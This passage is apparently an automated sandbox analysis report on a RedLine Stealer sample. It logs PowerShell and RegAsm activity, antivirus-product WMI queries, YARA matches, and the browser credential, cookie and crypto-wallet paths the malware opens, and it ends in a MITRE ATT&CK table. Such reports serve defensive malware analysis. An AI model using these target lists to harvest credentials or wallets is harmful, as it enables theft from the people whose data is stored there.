                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF7D6FD8964
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7D6FD2C54
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8044, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                  Source: powershell.exe, 00000004.00000002.2402928898.00007FFD9BA80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: Yara matchFile source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8044, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8044, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts221
                  Windows Management Instrumentation                  		111
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
